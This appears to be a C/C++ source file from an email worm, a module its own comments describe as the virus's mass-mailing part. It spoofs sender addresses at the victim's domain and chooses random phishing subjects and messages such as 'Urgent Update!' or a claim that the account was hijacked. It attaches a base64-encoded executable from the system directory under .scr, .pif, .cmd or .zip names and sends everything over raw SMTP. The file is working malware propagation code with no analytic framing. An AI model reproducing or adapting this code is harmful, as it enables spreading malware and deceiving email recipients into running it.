Message.h

1. /**************************************
2. * Purpose:
3. * Generates Email messages and sends
4. * the recipient of the virus
5. *
6. * TODO: Add in a mail queue. Chose random
7. * address from the queue and pop it off
8. * and use it as from address
9. *
10. **************************************/
11.  
12. // If there is an error return true so we don't **** up the massmailing
13. BOOL chk(int iStatus)
14. {
15.     if (iStatus!=SOCKET_ERROR && iStatus!=0)
16.     {
17.         return TRUE;
18.     }
19.     return FALSE;
20. }
21.  
22. char mail_1[64] = "", helokitty[64] = ""; //lol, meow! :=)
23. char bigbuff[4096],szLine[255],MessageBuffer[255];
24.  
25. //send the message buffer to the server we are connected to
26. void sendmsgbuff()
27. {
28.     if(!chk(send(hServer,MessageBuffer,strlen(MessageBuffer),0)))
29.         ErrorLevel = ERROR_LEVEL_SEND;
30.    
31. }
32. void recvbuff()
33. {
34.     if(!chk(recv(hServer,bigbuff,sizeof(bigbuff),0)))
35.         ErrorLevel = ERROR_LEVEL_RECEIVE;
36.     if (bigbuff[0]=='4' || bigbuff[0]=='5') ErrorLevel = ERROR_LEVEL_RECEIVE;
37.    
38. }
39.  
40. //gets the date from the local system and then implements that as the date of when the email was sent
41. void getdate(FILETIME *time, char *buf)
42. {
43.         SYSTEMTIME t;
44.     TIME_ZONE_INFORMATION tmz_info;
45.     DWORD daylight_flag; int utc_offs, utc_offs_u;
46.         LPSTR weekdays[7] = { "Sun", "Mon", "Tue", "Wed", "Thu", "Fri", "Sat" };
47.         LPSTR months[12] = { "Jan", "Feb", "Mar", "Apr", "May", "Jun", "Jul", "Aug", "Sep", "Oct", "Nov", "Dec" };
48.  
49.     if (time == NULL) {
50.             GetLocalTime(&t);
51.     } else {
52.         FILETIME lft;
53.         FileTimeToLocalFileTime(time, &lft);
54.         FileTimeToSystemTime(&lft, &t);
55.     }
56.  
57.     tmz_info.Bias = 0;
58.     daylight_flag = GetTimeZoneInformation(&tmz_info);
59.  
60.     utc_offs = tmz_info.Bias;
61.     if (daylight_flag == TIME_ZONE_ID_DAYLIGHT) utc_offs += tmz_info.DaylightBias;
62.     utc_offs = -utc_offs;
63.     utc_offs_u = (utc_offs >= 0) ? utc_offs : -utc_offs;
64.  
65.         if (t.wDayOfWeek > 6) t.wDayOfWeek = 6;
66.         if (t.wMonth == 0) t.wMonth = 1;
67.         if (t.wMonth > 12) t.wMonth = 12;
68. static const char szDns[] = "%s %u %s %u.2u. %s";
69.         wsprintf(buf,
70.                 "%s, %u %s %u %.2u:%.2u:%.2u %s%.2u%.2u",
71.                 weekdays[t.wDayOfWeek], t.wDay,
72.                 months[t.wMonth-1], t.wYear,
73.                 t.wHour, t.wMinute, t.wSecond,
74.         (utc_offs >= 0) ? "+" : "-",
75.         utc_offs_u / 60, utc_offs_u % 60
76.         );
77. }
78.  
79.  
80.  
81.  
82. BOOL sendmail(LPSTR strTo)
83. {
84.  
85.     char syste[100];
86.     GetSystemDirectory(syste,sizeof(syste));
87.     srand(GetTickCount()); //Seeds random number generator
88. #define CRLF "\r\n"
89.  
90. char* szBuf2 = new char[76];
91.  
92. /////////////////////////////////////////////////
93. static const char *gen_names[] = {
94.   "server","administration", "managment", "service", "userhelp"
95. };
96.  
97.  
98. #define gen_names_cnt (sizeof(gen_names) / sizeof(gen_names[0]))
99.  
100. #define dmain 80
101.     char domain[dmain], *p;
102.     for (p=strTo; *p && *p != '@'; p++);
103.     if (*p++ != '@') return 0;
104.     lstrcpyn(domain, p, dmain-1);
105. char froms[255];
106. int i;
107. i = rand() % gen_names_cnt;
108. lstrcpy(froms, gen_names[i]);
109.     lstrcat(froms, "@");
110.     lstrcat(froms, domain);
111.  
112. ////////////////////////////////////////////////
113.     char subject[200];
114. static const char *subjects[] = {
115.   "Urgent Update!", "Server Error", "User Info", "URGENT PLEASE READ!", "Detailed Information",
116.       "User Information", "Email Account Information"
117. };
118. #define subjects_names (sizeof(subjects) / sizeof(subjects[0]))
119. int j;
120. j = rand() % subjects_names;
121. lstrcpy(subject, subjects[j]);
122.  
123.  
124.  
125. ////////////////////////////////////////////////
126. char attachment[200];
127. static const char *attachments[] = {
128.   "Update","Details","Information", "Gift", "Word Document", "Account Information"
129. };
130.  
131. #define attachments_names (sizeof(attachments) / sizeof(attachments[0]))
132.  
133. int k;
134. k = rand() % attachments_names;
135. lstrcpy(attachment, attachments[k]);
136. ///////////////////////////////////////////////
137.  
138. char message[200];
139. static const char *messages[] = {
140.   "There is urgent information in the attachment regarding your Email account",
141.       "Your Email account information has been removed from the system due to inactivity. To renew your account information refer to the attachment",
142.       "We regret to inform you that your account has been hijacked and used for illegal purposes. The attachment has more information about what has happened.",
143.       "Our Email system has received reports of your account flooding email servers. There is more information on this matter in the attachment",
144.       "Due to recent internet attacks, your Email account security is being upgraded. The attachment contains more details",
145.       "Our server is experiencing some latency in our email service. The attachment contains details on how your account will be affected."
146. };
147.  
148. #define message_names (sizeof(messages) / sizeof(messages[0]))
149.  
150.  
151. int l;
152. l = rand() % message_names;
153. lstrcpy(message, messages[l]);
154.  
155. ////////////////////////////////////////////////
156. char extension[200];
157. static const char *extensions[] = {
158.   ".zip",".scr",".pif", ".cmd"
159. };
160.  
161. #define extensions_names (sizeof(extensions) / sizeof(extensions[0]))
162.  
163. int m;
164. m = rand() % extensions_names;
165. lstrcpy(extension, extensions[m]);
166. lstrcat(attachment,extension);
167. //printf(attachment); debugging purposes
168. ////////////////////////////////////////////////
169.    
170.  
171. ///////////////////////////////////////////////
172.  
173.  
174. if(strstr(attachment,".zip"))
175. {
176.    
177.     strcat(syste,"\\base64zip.sys");
178.     //printf(syste); debug
179. }
180. else
181. {
182.    
183.  
184. strcat(syste,"\\base64exe.sys");
185. //printf(syste); even more debuggin
186. }
187.  
188. //////////////////////////////////////////////
189.  
190. /***************************************
191. * Standard Email bullshit sent to the server
192. * I had to read some tutorials on this
193. * Main part of the massmailing :P
194. ***************************************/
195.  
196. //everytime you see sprintf(MessageBuffer,blah); it is just
197. // printing whatever arguements to the buffer then sends them to
198. // the recipient's server
199.  
200.     if (strlen(helokitty)>0) sprintf(MessageBuffer,"HELO <%s>%s",helokitty,CRLF);
201.     else sprintf(MessageBuffer,"HELO %s%s",domain,CRLF);
202.     sendmsgbuff(); recvbuff();
203.  
204.     if (strlen(mail_1)>0) sprintf(MessageBuffer,"MAIL FROM: <%s>%s",mail_1,CRLF);
205.     else sprintf(MessageBuffer,"MAIL FROM: <%s>%s",froms,CRLF);
206.     sendmsgbuff(); recvbuff();
207.  
208.     sprintf(MessageBuffer,"RCPT TO: <%s>%s",strTo,CRLF);
209.     sendmsgbuff(); recvbuff();
210.     sprintf(MessageBuffer,"DATA%s",CRLF);
211.     sendmsgbuff(); recvbuff();
212. char bufffer[MAX_PATH];
213.     getdate(NULL,bufffer);
214.     sprintf(MessageBuffer,"To: %s%s",strTo,CRLF); sendmsgbuff();
215.     sprintf(MessageBuffer,"Subject: %s%s",subject,CRLF); sendmsgbuff();
216.     sprintf(MessageBuffer,"Date: %s%s",bufffer,CRLF); sendmsgbuff();
217.     sprintf(MessageBuffer,"From: %s%s",froms,CRLF); sendmsgbuff();
218.     sprintf(MessageBuffer,"MIME-Version: 1.0%s",CRLF); sendmsgbuff();
219.     sprintf(MessageBuffer,"Content-Type: multipart/mixed;" ,CRLF); sendmsgbuff();
220.     sprintf(MessageBuffer,"boundary=\"--zzzxxxzzzxxx\"%s",CRLF); sendmsgbuff();
221.     sprintf(MessageBuffer,"X-Priotity: 3%s",CRLF); sendmsgbuff();
222.     sprintf(MessageBuffer,"X-MSMail-Priority: Normal%s",CRLF); sendmsgbuff();
223.     sprintf(MessageBuffer,"%sThis is a multipart MIME-encoded message%s%s",CRLF,CRLF,CRLF); sendmsgbuff();
224.     sprintf(MessageBuffer,"----zzzxxxzzzxxx%s",CRLF); sendmsgbuff();
225.     sprintf(MessageBuffer,"Content-Type: text/html; charset=\"us-ascii\"%s",CRLF); sendmsgbuff();
226.     sprintf(MessageBuffer,"Content-Transfer-Encoding: quoted-printable%s%s",CRLF,CRLF); sendmsgbuff();
227.     sprintf(MessageBuffer,"%s",CRLF); sendmsgbuff();
228.     sprintf(MessageBuffer,"%s%s",message,CRLF); sendmsgbuff();
229.     sprintf(MessageBuffer,"----zzzxxxzzzxxx%s",CRLF); sendmsgbuff();
230.     sprintf(MessageBuffer,"Content-Type: application/octet-stream; name=\"%s\"%s",attachment,CRLF); sendmsgbuff();
231.     sprintf(MessageBuffer,"Content-Transfer-Encoding: base64%s",CRLF); sendmsgbuff();
232.     sprintf(MessageBuffer,"Content-Disposition: attachment; filename=\"%s\"%s",attachment,CRLF); sendmsgbuff();
233.     sprintf(MessageBuffer,"%s",CRLF); sendmsgbuff();
234.     FILE* file1;
235.     char szBuf[MAX_PATH];
236.  
237.      char* strFile1 = new char[MAX_PATH];
238.     file1 = fopen(syste,"rb");
239.     if(file1==NULL)return 0;
240.     while(!feof(file1))
241.     {
242.         fscanf(file1,"%s\n",szBuf);
243.         sprintf(MessageBuffer,"%s%s",szBuf,CRLF);
244.         sendmsgbuff();
245.     }
246.  
247.     sprintf(MessageBuffer,"%s",CRLF); sendmsgbuff();
248.     sprintf(MessageBuffer,"----zzzxxxzzzxxx--%s",CRLF); sendmsgbuff();
249.     sprintf(MessageBuffer,"%s.%s",CRLF,CRLF);
250.     sendmsgbuff(); recvbuff();
251.     sprintf(MessageBuffer,"QUIT%s",CRLF);
252.     sendmsgbuff(); recvbuff();
253.     closesocket(hServer);
254.     return TRUE;
255. }
256.  
257.  
258.